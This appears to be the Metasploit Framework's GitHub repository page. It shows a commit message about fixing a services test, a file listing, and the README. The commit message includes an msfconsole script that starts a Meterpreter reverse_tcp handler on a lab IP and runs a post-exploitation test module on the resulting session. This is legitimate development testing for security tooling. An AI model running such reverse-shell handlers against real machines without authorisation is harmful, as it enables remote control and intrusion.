0c94536b87
Fix a funny default service name, adjust test to be case-agnostic. winmgmt on Windows XP and Windows 8 have different capitalization for this service. I'm not sure why it's a module parameter though - the test will still fail if its anything other than winmgmt. The following RC script has 7 successful outputs when run against a reverse_tcp shell. Run a reverse_tcp stager and the following RC script to run the test ``` loadpath test/modules use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.43.1 run -j sleep 5 use post/test/services set SESSION 1 run ``` Note: this test still doesn't run very reliably on windows 8 unless you're using the code from rapid7/meterpreter#107 and #4411, though it runs ok on Windows XP. |
||
---|---|---|
app | ||
config | ||
data | ||
db | ||
documentation | ||
external | ||
features | ||
lib | ||
modules | ||
plugins | ||
script | ||
scripts | ||
spec | ||
test | ||
tools | ||
.gitignore | ||
.gitmodules | ||
.mailmap | ||
.rspec | ||
.rubocop.yml | ||
.ruby-gemset | ||
.ruby-version | ||
.simplecov | ||
.travis.yml | ||
.yardopts | ||
CONTRIBUTING.md | ||
COPYING | ||
Gemfile | ||
Gemfile.local.example | ||
Gemfile.lock | ||
HACKING | ||
LICENSE | ||
README.md | ||
Rakefile | ||
metasploit-framework-db.gemspec | ||
metasploit-framework-full.gemspec | ||
metasploit-framework-pcap.gemspec | ||
metasploit-framework.gemspec | ||
msfbinscan | ||
msfcli | ||
msfconsole | ||
msfd | ||
msfelfscan | ||
msfencode | ||
msfmachscan | ||
msfpayload | ||
msfpescan | ||
msfrop | ||
msfrpc | ||
msfrpcd | ||
msfupdate | ||
msfvenom |
README.md
Metasploit
The Metasploit Framework is released under a BSD-style license. See COPYING for more details.
The latest version of this software is available from https://metasploit.com/
Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework
API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Installing
Generally, you should use the free installer which contains all dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.
Using Metasploit
Metasploit can do all sorts of things. The first thing you'll want to do
is start msfconsole
, but after that, you'll probably be best served by
reading Metasploit Unleashed, the great community
resources, or the wiki.
Contributing
See the Dev Environment Setup guide on GitHub which will walk you through the whole process starting from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more info, see Contributing.